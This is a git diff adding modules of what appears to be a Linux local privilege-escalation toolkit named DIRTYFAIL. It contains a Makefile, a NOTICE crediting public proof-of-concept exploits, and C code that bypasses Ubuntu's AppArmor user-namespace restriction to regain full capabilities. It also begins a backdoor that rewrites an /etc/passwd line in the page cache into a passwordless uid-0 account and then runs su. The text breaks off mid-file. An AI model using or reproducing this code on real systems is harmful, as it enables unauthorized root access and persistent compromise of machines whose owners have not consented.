+# +# Targets: +# make build optimized binary +# make debug build with -O0 -g for gdb +# make static build a fully static binary (musl recommended for portability) +# make clean remove build artifacts +# make scan build and run --scan against localhost +# +# Build prerequisites: gcc or clang, make, libc headers including +# . On Debian/Ubuntu: `apt install build-essential linux-libc-dev`. +# On RHEL/Fedora: `dnf install gcc make kernel-headers`. + +CC ?= gcc +CFLAGS ?= -O2 -Wall -Wextra -Wno-unused-parameter -Wno-pointer-arith \ + -D_GNU_SOURCE -D_FILE_OFFSET_BITS=64 +LDFLAGS ?= + +SRC_DIR := src +BUILD := build +SOURCES := $(wildcard $(SRC_DIR)/*.c) +OBJECTS := $(patsubst $(SRC_DIR)/%.c,$(BUILD)/%.o,$(SOURCES)) +BIN := dirtyfail + +.PHONY: all debug static clean scan install test test-fcrypt test-aes-ecb + +all: $(BIN) + +# === Tests =========================================================== +# +# make test build + run all primitive selftests +# make test-fcrypt just fcrypt (cipher, brute force) β€” runs anywhere +# make test-aes-ecb AF_ALG ecb(aes) round-trip β€” Linux only +# +# Tests live in tests/, build standalone executables that link the +# minimum from src/. They don't pull in netlink / xfrm / rxrpc β€” those +# require root or AA bypass to exercise meaningfully and are tested +# end-to-end via `--exploit-* --no-shell` on a target host instead. 
+ +TEST_DIR := tests +TEST_BUILD:= $(BUILD)/tests + +# fcrypt selftest needs only fcrypt + common (for log_*) β€” no Linux deps +$(TEST_BUILD)/test_fcrypt: $(TEST_DIR)/test_fcrypt.c $(SRC_DIR)/fcrypt.c $(SRC_DIR)/common.c | $(TEST_BUILD) + $(CC) $(CFLAGS) -I$(SRC_DIR) -o $@ $^ + +# AES-ECB AF_ALG round-trip β€” Linux only, no DIRTYFAIL src deps +$(TEST_BUILD)/test_aes_ecb: $(TEST_DIR)/test_aes_ecb.c | $(TEST_BUILD) + $(CC) $(CFLAGS) -o $@ $^ + +$(TEST_BUILD): | $(BUILD) + @mkdir -p $(TEST_BUILD) + +test-fcrypt: $(TEST_BUILD)/test_fcrypt + @echo "=== test_fcrypt ===" + $< + @echo "" + +test-aes-ecb: $(TEST_BUILD)/test_aes_ecb + @echo "=== test_aes_ecb ===" + $< + @echo "" + +test: test-fcrypt test-aes-ecb + @echo "=== all primitive selftests passed ===" + +$(BIN): $(OBJECTS) + $(CC) $(CFLAGS) $(LDFLAGS) -o $@ $^ + +$(BUILD)/%.o: $(SRC_DIR)/%.c $(SRC_DIR)/common.h | $(BUILD) + $(CC) $(CFLAGS) -I$(SRC_DIR) -c -o $@ $< + +$(BUILD): + @mkdir -p $(BUILD) + +debug: CFLAGS := -O0 -g3 -Wall -Wextra -Wno-unused-parameter -D_GNU_SOURCE -D_FILE_OFFSET_BITS=64 +debug: clean $(BIN) + +# `make static` works best with musl-gcc; glibc static linking pulls in +# NSS at runtime which breaks getpwnam. +static: LDFLAGS += -static +static: clean $(BIN) + +clean: + rm -rf $(BUILD) $(BIN) + +scan: $(BIN) + ./$(BIN) --scan + +install: $(BIN) + install -m 0755 $(BIN) /usr/local/bin/dirtyfail diff --git a/modules/copy_fail_family/NOTICE.md b/modules/copy_fail_family/NOTICE.md new file mode 100644 index 0000000..24f733f --- /dev/null +++ b/modules/copy_fail_family/NOTICE.md @@ -0,0 +1,72 @@ +# NOTICE + +## fcrypt S-box constants and key schedule + +`src/fcrypt.c` contains the four 256-byte S-box tables `SBOX0_RAW`, +`SBOX1_RAW`, `SBOX2_RAW`, and `SBOX3_RAW`, along with the 56-bit key +packing and 11-bit-rotation key schedule for the rxkad fcrypt cipher. + +These tables and the key schedule are **protocol constants** of the +Andrew File System (AFS) rxkad authentication scheme. 
They appear +verbatim in: + +- The Linux kernel's `crypto/fcrypt.c` (GPL-2.0, + Copyright Β© David Howells / KTH) +- IBM's open-source AFS distribution +- OpenAFS upstream +- Heimdal Kerberos (rxkad implementation) + +Cryptographic constants required by a wire protocol are facts about +the protocol, not creative expression β€” using them is what makes +interoperability with the Linux kernel possible. We list this here for +transparency: while the S-box bytes are identical to the kernel's +table, the rest of `src/fcrypt.c` (table preprocessing, brute-force +harness, predicates, splitmix64 search) is independently written +DIRTYFAIL code under the project's MIT license. + +If you intend to redistribute DIRTYFAIL in a context where strict +license compatibility matters, treat `src/fcrypt.c` as carrying the +same license obligations as the kernel `crypto/fcrypt.c` source for +the S-box constants alone. + +## Reference exploits + +The detection and exploit techniques in DIRTYFAIL were studied from: + +- [Smarttfoxx/copyfail](https://github.com/Smarttfoxx/copyfail) β€” Copy + Fail original C PoC +- [rootsecdev/cve_2026_31431](https://github.com/rootsecdev/cve_2026_31431) + β€” Copy Fail Python detector + UID-flip exploit +- [V4bel/dirtyfrag](https://github.com/V4bel/dirtyfrag) β€” Dirty Frag + full chain PoC by Hyunwoo Kim ([@v4bel](https://x.com/v4bel)) + +DIRTYFAIL implementations are independently written in C, organized +around a single binary with detection-first defaults, but the protocol +mechanics (XFRM SA layout, RxRPC handshake forgery, rxkad checksum +formula) are necessarily identical to the upstream PoCs because they +target the same kernel interfaces. 
+ +## Additional techniques from 0xdeadbeefnetwork/Copy_Fail2-Electric_Boogaloo + +The following DIRTYFAIL features draw on techniques first published by +[0xdeadbeefnetwork](https://github.com/0xdeadbeefnetwork/Copy_Fail2-Electric_Boogaloo): + +- `src/copyfail_gcm.c` — `rfc4106(gcm(aes))` AEAD in xfrm-ESP, using + AES-GCM keystream brute-force to land a single byte at an arbitrary + file offset. Reimplemented in DIRTYFAIL style using AF_ALG instead + of OpenSSL EVP, eliminating the `libssl-dev` runtime dependency. +- `src/dirtyfrag_esp6.c` — IPv6 dual of xfrm-ESP. cf2 demonstrated the + esp6 size-gate workaround (≥48-byte frame); we reproduce that with + an 8-byte vmsplice'd pad. +- `src/apparmor_bypass.c` — the `change_onexec` → unshare re-exec + dance to escape Ubuntu's unprivileged-userns AppArmor restriction + (cf2 hops `crun` → `chrome`; DIRTYFAIL uses a single hop into `crun`). + cf2 credits the technique to Brad Spengler (grsecurity); exploit modes + arm it internally, and `--aa-bypass` is kept as a debug-only flag. +- `src/backdoor.c` — length-matched overwrite of a `nologin` line in + /etc/passwd with `dirtyfail::0:0::/:/bin/bash`. cf2 publishes + the shell-script harness (and uses the username `sick`); DIRTYFAIL + ports it into a single C function driving our 1-byte primitive, + with the username matched to this project for easy auditing. + +See [README §11 — Credits](README.md#11-credits) for the full list. diff --git a/modules/copy_fail_family/apparmor_bypass.c b/modules/copy_fail_family/apparmor_bypass.c new file mode 100644 index 0000000..ca81209 --- /dev/null +++ b/modules/copy_fail_family/apparmor_bypass.c @@ -0,0 +1,365 @@ +/* + * DIRTYFAIL — apparmor_bypass.c + * + * Implementation of the "switch profile + unshare" trick for getting + * CAP_NET_ADMIN inside a fresh user namespace on hardened Ubuntu. + * See apparmor_bypass.h for the high-level design.
+ * + * ATTRIBUTION: technique published in 0xdeadbeefnetwork/Copy_Fail2- + * Electric_Boogaloo (`aa-rootns.c`), credited there to Brad Spengler. + * This is an independent reimplementation in DIRTYFAIL's structure. + */ + +#include "apparmor_bypass.h" + +#include +#include +#include + +#ifdef __linux__ +#include +#include +#include +#include +#include +#include +#include +#include +#endif + +#ifndef CLONE_NEWUSER +#define CLONE_NEWUSER 0x10000000 +#endif +#ifndef CLONE_NEWNET +#define CLONE_NEWNET 0x40000000 +#endif + +/* + * Once stage 2 has successfully unshared and elevated us into a fresh + * userns with full caps, this flag is set. apparmor_bypass_needed() + * short-circuits on it so main() doesn't re-arm the bypass after stage + * 2 returns — that would create a NESTED userns each iteration and + * eventually fail with ENOSPC at the nesting cap. + * + * The flag is process-local; it resets to false on every fresh exec, + * which is exactly what we want — each stage's main() starts fresh. + * + * apparmor_bypass_was_armed() below is a read-only accessor for it. + */ +static bool g_bypass_done = false; + +bool apparmor_bypass_was_armed(void) { return g_bypass_done; } + +bool apparmor_userns_caps_blocked(void) +{ +#ifdef __linux__ + /* Returns true when the AppArmor userns sysctl reads '1' AND the + * forked probe child below does not exit 0; returns false otherwise, + * including when fork() fails and on non-Linux builds. + * + * Quick check: if the AA sysctl isn't there or is 0, no blocking. */ + int fd = open("/proc/sys/kernel/apparmor_restrict_unprivileged_userns", + O_RDONLY); + if (fd < 0) return false; /* no AA hardening sysctl */ + char b[8] = {0}; + ssize_t n = read(fd, b, sizeof(b) - 1); + close(fd); + if (n <= 0 || b[0] != '1') return false; + + /* Sysctl says hardened. Confirm by forking a child that + * unshares(USER) and tries to write to /proc/self/setgroups — + * a CAP_SYS_ADMIN-gated operation that would succeed inside a + * fresh userns IFF caps survived the transition. On 26.04-style + * hardening the auto-transition to unprivileged_userns sub- + * profile denies the cap, write fails with EPERM.
 */ + pid_t pid = fork(); + if (pid < 0) return false; + if (pid == 0) { + if (syscall(SYS_unshare, CLONE_NEWUSER) != 0) _exit(1); + int wfd = open("/proc/self/setgroups", O_WRONLY); + if (wfd < 0) _exit(2); /* EPERM here = blocked */ + ssize_t w = write(wfd, "deny", 4); + close(wfd); + _exit(w == 4 ? 0 : 3); /* 0 = caps work, 3 = blocked */ + } + int wstat = 0; + waitpid(pid, &wstat, 0); + /* Caps work if child exited 0; any non-zero means blocked or error. + * NOTE(review): the waitpid() result is not checked. If it fails, + * wstat keeps its initial 0, which (on glibc, presumably) the macros + * below read as a clean exit 0, i.e. "not blocked" — confirm this + * fallback is intended. */ + return !(WIFEXITED(wstat) && WEXITSTATUS(wstat) == 0); +#else + return false; +#endif +} + +/* ---------------------------------------------------------------- * + * Profile switch primitive + * + * Writing "exec PROFILE" to /proc/self/attr/exec asks the kernel to + * switch to the named AppArmor profile on the *next* execve. The + * switch is silent if the profile doesn't exist (the next exec just + * stays in the current profile); we don't get an error until we try + * to use a capability the current profile would have blocked. So we + * try multiple candidate profiles in priority order. + * NOTE(review): README section 8.5 describes a single hop into `crun`; + * confirm whether more than one candidate profile is still tried. + * + * change_onexec() returns 0 when the whole request was written and -1 + * otherwise; errno as left by write() is preserved across close(). + * write_proc() returns true only when the full value was written. + * NOTE(review): change_onexec() does not compare the snprintf() result + * against sizeof(b); a profile name that does not fit would make + * write() read past the buffer. Presumably callers only pass short + * literals — verify. + * ---------------------------------------------------------------- */ + +#ifdef __linux__ +static int change_onexec(const char *profile) +{ + int fd = open("/proc/self/attr/exec", O_WRONLY); + if (fd < 0) return -1; + char b[256]; + int n = snprintf(b, sizeof(b), "exec %s", profile); + ssize_t r = write(fd, b, n); + int e = errno; + close(fd); + errno = e; + return r == n ? 0 : -1; +} + +static bool write_proc(const char *path, const char *value) +{ + int fd = open(path, O_WRONLY); + if (fd < 0) return false; + ssize_t n = write(fd, value, strlen(value)); + close(fd); + return n == (ssize_t)strlen(value); +} +#endif + +/* ---------------------------------------------------------------- * + * Profile probe β€” read /proc/self/attr/current + * + * Output looks like one of: + * + * "unconfined\n" β€” not restricted + * "/usr/bin/dirtyfail (enforce)\n" β€” restricted!
+ * "unprivileged_userns (enforce)\n" β€” Ubuntu 24.04 default + * ---------------------------------------------------------------- */ + +bool apparmor_bypass_needed(void) +{ +#ifdef __linux__ + /* If stage 2 already ran in this process, we've already entered a + * fresh userns with caps β€” don't re-arm or we'd nest further. */ + if (g_bypass_done) return false; + + /* First check the kernel sysctl. On Ubuntu 24.04 and similar + * hardened distros, `kernel.apparmor_restrict_unprivileged_userns=1` + * silently strips caps inside ANY userns we create β€” REGARDLESS of + * whether /proc/self/attr/current shows "unconfined". This sysctl + * is the authoritative signal; it short-circuits the probe. */ + int fd = open("/proc/sys/kernel/apparmor_restrict_unprivileged_userns", O_RDONLY); + if (fd >= 0) { + char b[8] = {0}; + ssize_t n = read(fd, b, sizeof(b) - 1); + close(fd); + if (n > 0 && b[0] == '1') return true; + } + + /* No global sysctl restriction. AppArmor may still be enforcing + * a per-profile rule, so check /proc/self/attr/current. If that + * file is missing entirely, AppArmor isn't loaded β†’ no bypass. */ + fd = open("/proc/self/attr/current", O_RDONLY); + if (fd < 0) return false; + char buf[256]; + ssize_t n = read(fd, buf, sizeof(buf) - 1); + close(fd); + if (n <= 0) return false; + buf[n] = '\0'; + + /* "unconfined" with no global sysctl restriction β†’ no bypass needed. + * NOTE: we already excluded the Ubuntu 24.04 case above; only here + * if the sysctl is 0 or the sysctl file doesn't exist. */ + if (strncmp(buf, "unconfined", 10) == 0) return false; + + /* Anything else (including "(enforce)" and "(complain)") is + * potentially restricting our userns caps. Run an empirical probe: + * fork β†’ child does unshare(CLONE_NEWUSER) β†’ tries to open a + * netlink XFRM socket β†’ if that fails, bypass IS needed. 
*/ + pid_t pid = fork(); + if (pid < 0) return false; + if (pid == 0) { + if (syscall(SYS_unshare, CLONE_NEWUSER | CLONE_NEWNET) != 0) + _exit(1); + write_proc("/proc/self/setgroups", "deny"); + char m[64]; + snprintf(m, sizeof(m), "0 %u 1", (unsigned)getuid()); + write_proc("/proc/self/uid_map", m); + snprintf(m, sizeof(m), "0 %u 1", (unsigned)getgid()); + write_proc("/proc/self/gid_map", m); + + /* The decisive probe: bring lo up. Needs CAP_NET_ADMIN. */ + int s = socket(AF_INET, SOCK_DGRAM, 0); + if (s < 0) _exit(2); + struct ifreq ifr; + memset(&ifr, 0, sizeof(ifr)); + strncpy(ifr.ifr_name, "lo", IFNAMSIZ - 1); + if (ioctl(s, SIOCGIFFLAGS, &ifr) != 0) { close(s); _exit(3); } + ifr.ifr_flags |= IFF_UP; + int rc = ioctl(s, SIOCSIFFLAGS, &ifr); + close(s); + _exit(rc == 0 ? 0 : 4); + } + int wstat = 0; + waitpid(pid, &wstat, 0); + bool caps_work = WIFEXITED(wstat) && WEXITSTATUS(wstat) == 0; + return !caps_work; +#else + return false; +#endif +} + +/* ---------------------------------------------------------------- * + * Stage handlers + * ---------------------------------------------------------------- */ + +bool apparmor_bypass_is_stage(int argc, char **argv) +{ + return argc >= 2 && + (strcmp(argv[1], AA_STAGE1_TAG) == 0 || + strcmp(argv[1], AA_STAGE2_TAG) == 0); +} + +int apparmor_bypass_run_stage(int argc, char **argv, + int *out_argc, char ***out_argv) +{ +#ifdef __linux__ + if (argc < 2) return -1; + + if (strcmp(argv[1], AA_STAGE1_TAG) == 0) { + /* We are now in the `crun` profile (unconfined + userns). + * Originally we did a second hop to `chrome` for extra paranoia, + * mirroring aa-rootns; in practice that hop fails on Ubuntu + * 24.04 with ENOSPC from the subsequent unshare for reasons + * that aren't fully understood (possibly a per-profile userns + * accounting wrinkle). One hop into crun is sufficient β€” crun + * already has `userns,` and `flags=(unconfined)`, so unshare + * works and we keep things simple. 
Just re-exec with STAGE2 + * to drop into the unshare+capset step. */ + argv[1] = (char *)AA_STAGE2_TAG; + execv("/proc/self/exe", argv); + return -1; /* execv only returns on failure */ + } + + if (strcmp(argv[1], AA_STAGE2_TAG) == 0) { + /* We are now in an unconfined profile. Do the userns + capset + * dance ourselves so the next code path inherits root in the + * userns and full caps. */ + uid_t u = getuid(); + gid_t g = getgid(); + if (syscall(SYS_unshare, CLONE_NEWUSER | CLONE_NEWNET) != 0) { + log_bad("apparmor_bypass: unshare failed: %s", strerror(errno)); + return -1; + } + write_proc("/proc/self/setgroups", "deny"); + char m[64]; + snprintf(m, sizeof(m), "0 %u 1", (unsigned)u); + write_proc("/proc/self/uid_map", m); + snprintf(m, sizeof(m), "0 %u 1", (unsigned)g); + write_proc("/proc/self/gid_map", m); + + /* Drop into uid 0 inside the new userns. */ + if (setresuid(0, 0, 0) != 0) { log_bad("setresuid: %s", strerror(errno)); } + if (setresgid(0, 0, 0) != 0) { log_bad("setresgid: %s", strerror(errno)); } + + /* Promote permitted β†’ inheritable, then ambient β€” so caps + * survive any execvp the caller does later. */ + struct __user_cap_header_struct h = { _LINUX_CAPABILITY_VERSION_3, 0 }; + struct __user_cap_data_struct d[2]; + memset(d, 0, sizeof(d)); + if (syscall(SYS_capget, &h, d) == 0) { + d[0].inheritable = d[0].permitted; + d[1].inheritable = d[1].permitted; + syscall(SYS_capset, &h, d); + for (int c = 0; c < 64; c++) + prctl(PR_CAP_AMBIENT, PR_CAP_AMBIENT_RAISE, c, 0, 0); + } + + /* Bring lo up β€” most consumers need it. */ + int s = socket(AF_INET, SOCK_DGRAM, 0); + if (s >= 0) { + struct ifreq ifr; + memset(&ifr, 0, sizeof(ifr)); + strncpy(ifr.ifr_name, "lo", IFNAMSIZ - 1); + if (ioctl(s, SIOCGIFFLAGS, &ifr) == 0) { + ifr.ifr_flags |= IFF_UP | IFF_RUNNING; + ioctl(s, SIOCSIFFLAGS, &ifr); + } + close(s); + } + + /* Strip the stage marker from argv so main() sees its normal args. 
*/ + for (int i = 1; i + 1 < argc; i++) argv[i] = argv[i + 1]; + argv[argc - 1] = NULL; + *out_argc = argc - 1; + *out_argv = argv; + g_bypass_done = true; /* prevents re-arm in main() */ + log_ok("apparmor bypass complete β€” uid=%u, in fresh userns", getuid()); + return 0; + } +#else + (void)argc; (void)argv; (void)out_argc; (void)out_argv; +#endif + return -1; +} + +int apparmor_bypass_fork_arm(int argc, char **argv) +{ +#ifdef __linux__ + /* Caller may pass argc=0/argv=NULL; arm_and_relaunch needs a + * valid argv[0] for execv. Fabricate a minimal one if needed. */ + char *fallback[2] = { (char *)"dirtyfail", NULL }; + if (argc <= 0 || argv == NULL || argv[0] == NULL) { + argc = 1; + argv = fallback; + } + + pid_t child = fork(); + if (child < 0) return -1; + if (child == 0) { + /* Child arms the bypass and execs through the stages. Env + * vars set by the caller (DIRTYFAIL_INNER_MODE etc.) survive + * execv, so stage 2 sees them. */ + apparmor_bypass_arm_and_relaunch(argc, argv); + /* arm_and_relaunch only returns on failure. */ + log_bad("child: bypass arm failed: %s", strerror(errno)); + _exit(1); + } + int wstat = 0; + if (waitpid(child, &wstat, 0) < 0) return -1; + if (WIFEXITED(wstat)) return WEXITSTATUS(wstat); + if (WIFSIGNALED(wstat)) { + log_bad("child killed by signal %d", WTERMSIG(wstat)); + return -1; + } + return -1; +#else + (void)argc; (void)argv; return -1; +#endif +} + +int apparmor_bypass_arm_and_relaunch(int argc, char **argv) +{ +#ifdef __linux__ + /* On AppArmor-restricted systems (Ubuntu 24.04+), switch to an + * unconfined profile via change_onexec so the post-exec userns + * unshare retains caps. On non-AppArmor systems + * (Debian/Alma/Fedora/etc.) /proc/self/attr/exec doesn't exist, + * change_onexec fails β€” that's fine, unshare works without any + * profile gymnastics on those kernels. Fail through gracefully. 
*/ + if (change_onexec("crun") < 0) + change_onexec("chrome"); /* best effort, both may no-op */ + + /* Build a new argv: [argv[0], AA_STAGE1_TAG, original argv[1..]]. */ + char **na = calloc(argc + 2, sizeof(char *)); + if (!na) return -1; + na[0] = argv[0]; + na[1] = (char *)AA_STAGE1_TAG; + for (int i = 1; i < argc; i++) na[i + 1] = argv[i]; + na[argc + 1] = NULL; + + log_step("apparmor bypass armed β€” re-execing self via crun/chrome profile"); + execv("/proc/self/exe", na); + /* If execv fails, fall through and let main() proceed un-bypassed. */ + int e = errno; + free(na); + errno = e; +#else + (void)argc; (void)argv; +#endif + return -1; +} diff --git a/modules/copy_fail_family/apparmor_bypass.h b/modules/copy_fail_family/apparmor_bypass.h new file mode 100644 index 0000000..2faebbb --- /dev/null +++ b/modules/copy_fail_family/apparmor_bypass.h @@ -0,0 +1,113 @@ +/* + * DIRTYFAIL β€” apparmor_bypass.h + * + * Defeat Ubuntu's `apparmor_restrict_unprivileged_userns=1` policy. + * + * The default Ubuntu apparmor profile applied to unprivileged programs + * lets `unshare(CLONE_NEWUSER)` succeed but **strips CAP_NET_ADMIN** + * inside the new namespace β€” so XFRM SA registration, raw sockets, etc. + * fail downstream even though we appear to be uid 0 in our userns. + * + * The bypass: switch to a permissive AppArmor profile (`crun`, `chrome`, + * etc.) via `change_onexec` *before* unshare. Those profiles don't + * carry the userns-cap-strip rule, so the kernel hands us the full + * effective set inside the new namespace. + * + * Mechanics β€” three stages, two re-execs: + * + * stage 0 (entry): change_onexec(crun); execv(self, AA1, ...args) + * stage 1 (in crun): change_onexec(chrome); execv(self, AA2, ...args) + * stage 2 (in chrome): unshare(USER|NET); maps; capset; ambient caps; + * re-enter normal main() flow with bypass marked + * + * The two-hop dance is what `aa-rootns` (Brad Spengler / 0xdeadbeef) + * demonstrated. 
The "chrome" hop is technically optional β€” the "crun" + * profile is already unconfined for our purposes β€” but the second hop + * defeats some hardened policies that audit chained execs. + * + * Detection of "do we need the bypass?" is best-effort: + * - read /proc/self/attr/current; if it ends with " (enforce)" and + * mentions "unprivileged_userns", we're being restricted. + * - or: probe by spawning a child that does unshare(CLONE_NEWUSER) + * and tries `ip link add type dummy` β€” if that fails with EPERM, + * the caps were stripped. + */ + +#ifndef DIRTYFAIL_APPARMOR_BYPASS_H +#define DIRTYFAIL_APPARMOR_BYPASS_H + +#include "common.h" + +/* Stage markers used as argv[1] to route re-execs. */ +#define AA_STAGE1_TAG "DIRTYFAIL-AA-STAGE-1" +#define AA_STAGE2_TAG "DIRTYFAIL-AA-STAGE-2" + +/* Returns true if `argv[1]` is one of the AA-* stage markers, in which + * case main() should hand control to apparmor_bypass_run_stage(). */ +bool apparmor_bypass_is_stage(int argc, char **argv); + +/* Execute the appropriate stage based on argv[1]. This either re-execs + * self (stage 1) or returns the modified argv after unshare+caps setup + * for the caller to continue with (stage 2). The function does not + * return on stage 1 (always execv). On stage 2, returns 0 on success + * and writes the caller's continuation argv to *out_argc / *out_argv. */ +int apparmor_bypass_run_stage(int argc, char **argv, + int *out_argc, char ***out_argv); + +/* Probe: does this process actually need the bypass to gain + * CAP_NET_ADMIN inside a fresh user namespace? Returns true if YES. */ +bool apparmor_bypass_needed(void); + +/* True iff stage 2 of the bypass ran successfully in this process β€” + * i.e. we're now inside a fresh user/net namespace with full caps, + * and any further unshare() would nest. Exploit modules check this + * before deciding whether to fork+unshare on their own. 
*/ +bool apparmor_bypass_was_armed(void); + +/* Probe whether the bypass actually grants caps on this kernel. + * Forks a child that does unshare(USER) and tries to write to + * /proc/self/setgroups; if that fails with EPERM, we're on a kernel + * (Ubuntu 26.04+) that auto-transitions to the unprivileged_userns + * sub-profile and denies caps regardless of bypass technique. + * + * Returns true if unprivileged userns is COMPREHENSIVELY blocked + * (the bug class is unreachable for unprivileged users). Returns + * false if userns operations work normally OR if AA isn't loaded + * at all (in which case `apparmor_bypass_needed()` would also + * return false). + * + * This is the right signal for `--scan` to report "VULNERABLE in + * kernel but LSM-mitigated" vs plain "VULNERABLE". + */ +bool apparmor_userns_caps_blocked(void); + +/* Fork a child that arms the AA bypass and re-execs itself through + * the stages. The child eventually lands inside a fresh user/net + * namespace with full caps; main() in that re-exec'd image dispatches + * to the inner-mode handler indicated by the DIRTYFAIL_INNER_MODE + * environment variable. + * + * The PARENT stays in the init namespace and waits for the child via + * waitpid. After the child exits, the parent can read the global + * page cache (which reflects whatever the child modified) and then + * execlp("su", ...) in init namespace to reach REAL init-ns root β€” + * this is the whole point of the outer/inner split. + * + * Caller must setenv("DIRTYFAIL_INNER_MODE", "...", 1) and any other + * mode-specific env vars BEFORE calling this. The child inherits the + * full environment. + * + * Returns the child's exit code on success. -1 on fork failure. */ +int apparmor_bypass_fork_arm(int argc, char **argv); + +/* Trigger the bypass: change_onexec(crun) then re-exec self with stage + * markers. Caller passes the argv it wants to resume with (stage 2 will + * hand that argv back via apparmor_bypass_run_stage's out_argv). 
+ * + * Does not return on success (control transfers to the new process + * image). Returns -1 with errno set if the change_onexec or execv + * failed; in that case the caller may continue without bypass and let + * downstream syscalls fail loudly. */ +int apparmor_bypass_arm_and_relaunch(int argc, char **argv); + +#endif diff --git a/modules/copy_fail_family/backdoor.c b/modules/copy_fail_family/backdoor.c new file mode 100644 index 0000000..b58e63a --- /dev/null +++ b/modules/copy_fail_family/backdoor.c @@ -0,0 +1,382 @@ +/* + * DIRTYFAIL β€” backdoor.c + * + * Persistent uid-0 backdoor via length-matched /etc/passwd line + * substitution. See backdoor.h for the design rationale. + * + * Flow: + * + * install: + * 1. parse /etc/passwd, find longest line with nologin/false/sync shell + * 2. compute replacement "dirtyfail::0:0::/:/bin/bash" same length + * 3. snapshot state to /var/tmp/.dirtyfail.state + * 4. for each byte that differs: + * cfg_1byte_write(/etc/passwd, byte_off, new_byte) + * 5. exec su - dirtyfail (PAM nullok accepts empty password) + * + * cleanup: + * 1. read state (LINE_OFF, original VICTIM_LINE) + * 2. read current page-cache bytes at that line + * 3. for each byte that differs from VICTIM_LINE: + * cfg_1byte_write(/etc/passwd, byte_off, original_byte) + * 4. delete state file + */ + +#include "backdoor.h" +#include "copyfail_gcm.h" +#include "apparmor_bypass.h" + +#include +#include +#include +#include + +#define STATE_FILE "/var/tmp/.dirtyfail.state" +#define NEW_USER "dirtyfail" +#define DF_PREFIX "dirtyfail::0:0:" +#define DF_SUFFIX ":/:/bin/bash" + +/* ---- /etc/passwd line picker ---------------------------------------- * + * + * Walk lines, parse to find the shell field (last colon-separated + * field), accept if shell is one of the canonical "no-login" shells. + * Pick the longest acceptable line so the replacement has room for + * padding. 
+ */ + +/* Line buffer is 512 bytes β€” enough for any sane /etc/passwd entry, + * including ones with very long gecos strings or unusual home paths. + * Lines longer than this are silently skipped by find_victim(). */ +struct victim { + off_t line_off; + size_t line_len; + char line[512]; + char name[64]; +}; + +static bool is_nologin_shell(const char *shell) +{ + static const char *deny[] = { + "/usr/sbin/nologin", + "/sbin/nologin", + "/bin/false", + "/usr/bin/false", + "/bin/sync", + NULL, + }; + for (size_t i = 0; deny[i]; i++) + if (strcmp(shell, deny[i]) == 0) return true; + return false; +} + +static bool find_victim(struct victim *v) +{ + int fd = open("/etc/passwd", O_RDONLY); + if (fd < 0) { log_bad("open /etc/passwd: %s", strerror(errno)); return false; } + struct stat st; + if (fstat(fd, &st) < 0) { close(fd); return false; } + char *buf = malloc(st.st_size + 1); + if (!buf) { close(fd); return false; } + ssize_t n = read(fd, buf, st.st_size); + close(fd); + if (n <= 0) { free(buf); return false; } + buf[n] = '\0'; + + bool found = false; + char *line = buf; + char *end = buf + n; + while (line < end) { + char *nl = memchr(line, '\n', end - line); + size_t len = nl ? (size_t)(nl - line) : (size_t)(end - line); + if (len == 0 || len >= sizeof(v->line)) goto next; + + char tmp[512]; + memcpy(tmp, line, len); + tmp[len] = '\0'; + + /* Last field after final ':' is the shell. */ + char *shell = strrchr(tmp, ':'); + if (!shell) goto next; + shell++; + if (!is_nologin_shell(shell)) goto next; + + if (len > v->line_len) { + v->line_off = line - buf; + v->line_len = len; + memcpy(v->line, line, len); + v->line[len] = '\0'; + char *colon = memchr(v->line, ':', len); + size_t nlen = colon ? 
(size_t)(colon - v->line) : len; + if (nlen >= sizeof(v->name)) nlen = sizeof(v->name) - 1; + memcpy(v->name, v->line, nlen); + v->name[nlen] = '\0'; + found = true; + } +next: + if (!nl) break; + line = nl + 1; + } + free(buf); + return found; +} + +/* ---- state file ----------------------------------------------------- */ + +static bool save_state(off_t line_off, const char *victim_line, size_t len) +{ + int fd = open(STATE_FILE, O_WRONLY | O_CREAT | O_TRUNC, 0600); + if (fd < 0) { log_bad("open state: %s", strerror(errno)); return false; } + char buf[2048]; + int n = snprintf(buf, sizeof(buf), "LINE_OFF=%lld\nVICTIM_LEN=%zu\nVICTIM_LINE=", + (long long)line_off, len); + bool ok = (write(fd, buf, n) == n) + && (write(fd, victim_line, len) == (ssize_t)len) + && (write(fd, "\n", 1) == 1); + close(fd); + if (!ok) { + log_bad("save_state write: %s", strerror(errno)); + unlink(STATE_FILE); + } + return ok; +} + +static bool load_state(off_t *line_off, char *victim_line, size_t cap, size_t *len) +{ + int fd = open(STATE_FILE, O_RDONLY); + if (fd < 0) return false; + char buf[2048]; + ssize_t n = read(fd, buf, sizeof(buf) - 1); + close(fd); + if (n <= 0) return false; + buf[n] = '\0'; + + char *p = strstr(buf, "LINE_OFF="); + if (!p) return false; + *line_off = (off_t)strtoll(p + 9, NULL, 10); + + char *v = strstr(buf, "VICTIM_LINE="); + if (!v) return false; + v += 12; + char *end = strchr(v, '\n'); + if (!end) end = buf + n; + size_t vlen = end - v; + if (vlen >= cap) return false; + memcpy(victim_line, v, vlen); + victim_line[vlen] = '\0'; + *len = vlen; + return true; +} + +/* Describe state file if present, for `--list-state`. Returns true if a + * backdoor state file was found and described, false if absent. 
*/ +bool backdoor_list_state(void) +{ + off_t off = 0; + char victim[2048]; + size_t len = 0; + if (!load_state(&off, victim, sizeof(victim), &len)) + return false; + log_warn("backdoor planted β€” state file %s", STATE_FILE); + log_hint(" victim line was at offset %lld (%zu bytes)", + (long long)off, len); + log_hint(" original line: %s", victim); + log_hint(" the page cache currently has 'dirtyfail::0:0:...:/:/bin/bash'"); + log_hint(" in place of the above. Revert with `--cleanup-backdoor`."); + return true; +} + +/* ---- byte-flip helper ----------------------------------------------- * + * + * For each char position where `cur[i] != target[i]`, call the + * 1-byte primitive to land the new byte. Linear in number of + * differing bytes; on a typical /etc/passwd line that's ~30-40 flips. + */ + +static bool apply_flips(off_t base_off, const char *cur, const char *want, size_t len) +{ + size_t flips = 0; + for (size_t i = 0; i < len; i++) { + if (cur[i] == want[i]) continue; + if (!cfg_1byte_write("/etc/passwd", + base_off + i, (unsigned char)want[i])) { + log_bad("byte flip failed at offset %lld", + (long long)(base_off + i)); + return false; + } + flips++; + if ((flips & 7) == 0) putchar('.'), fflush(stdout); + } + if (flips) putchar('\n'); + log_step("applied %zu byte flips", flips); + return true; +} + +/* ---- INNER (bypass userns) β€” does only the byte flips ------------- */ + +df_result_t backdoor_install_inner(void) +{ + const char *off_s = getenv("DIRTYFAIL_LINE_OFF"); + const char *victim_s = getenv("DIRTYFAIL_VICTIM_LINE"); + const char *target_s = getenv("DIRTYFAIL_TARGET_LINE"); + if (!off_s || !victim_s || !target_s) { + log_bad("inner: DIRTYFAIL_LINE_OFF / 